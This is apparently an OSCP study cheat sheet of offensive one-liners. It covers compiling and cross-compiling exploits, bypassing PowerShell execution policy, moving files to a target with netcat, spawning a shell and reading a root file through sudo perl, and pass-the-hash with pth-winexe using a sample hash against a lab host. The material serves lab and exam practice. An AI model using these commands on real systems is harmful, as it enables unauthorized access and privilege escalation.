OSCP
MISC
Compiling Exploits
# Compile C code; add -m32 after 'gcc' to build 32-bit code on 64-bit Linux
gcc -o exploit exploit.c
# Cross-compile a Windows binary on Linux (ws2_32 is the Winsock library)
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

Cross compiling
# Compile a Windows exploit on Linux with the w64 mingw toolchain
i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe

Compile Python script to executable
# Run the Windows PyInstaller under wine to produce a single .exe
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile exploit.py

Packet Inspection
# Capture TCP port 80 traffic on eth0 and write it to a pcap file
tcpdump -i eth0 -w output.pcap tcp port 80

Powershell bypass
# Run a script regardless of the execution policy, without logo, profile or prompts
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1

Windows Exploit Suggester
# -d: downloaded MS security bulletin database, -i: output of systeminfo saved to a file
./windows-exploit-suggester.py -d 2019-07-20-mssb.xls -i system.txt

Finding Auxiliary
# List the nmap NSE scripts whose names match both "smb" and "vuln"
ls /usr/share/nmap/scripts/ | grep smb | grep vuln

Netcat
File transfer from attacker to target
At target (listen and write whatever arrives to a file)
nc -lvp 6969 > blah.txt
At attacker (method 1)
nc x.x.x.x 6969 < blah.txt
At attacker (method 2)
cat blah.txt | nc x.x.x.x 6969

Perl Exploit
# Spawn a shell from perl
perl -e 'exec "/bin/sh";'
# Read a file via sudo perl: split each line on ':' and print the first field
sudo perl -F: -lane 'print $F[0]' /root/root.txt

Awk
Remove duplicate lines (keeps the first occurrence, preserves order):
awk '!seen[$0]++' file

Searchsploit
# --mirror copies the exploit with the given EDB-ID to the current directory
searchsploit --overflow --exact --mirror 21234
# --exact matches the term against titles only, --overflow lets long titles wrap
searchsploit --overflow --exact Gwolle

Firewall Rule Enable
# Allow TCP 80 and 443 from a single source address
ufw allow from victimip to any port 80,443 proto tcp

Wordlist Creation
# Spider the site and build a wordlist; -e includes e-mail addresses, -a includes meta data
cewl -w cewl-forum.txt -e -a http://forum.bart.htb

PASS the HASH
Pass the hash:
# Prompt for the password (or hash)
pth-winexe -U jenkins/administrator //ip cmd.exe
# Supply the password inline after %
pth-winexe -U jenkins/administrator%password //ip cmd.exe
# Alternative tool
crackmapexec
# Supply the LM:NT hash pair inline; --system runs the command as SYSTEM
pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe

Share folder Windows to linux
mount -t fuse.vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other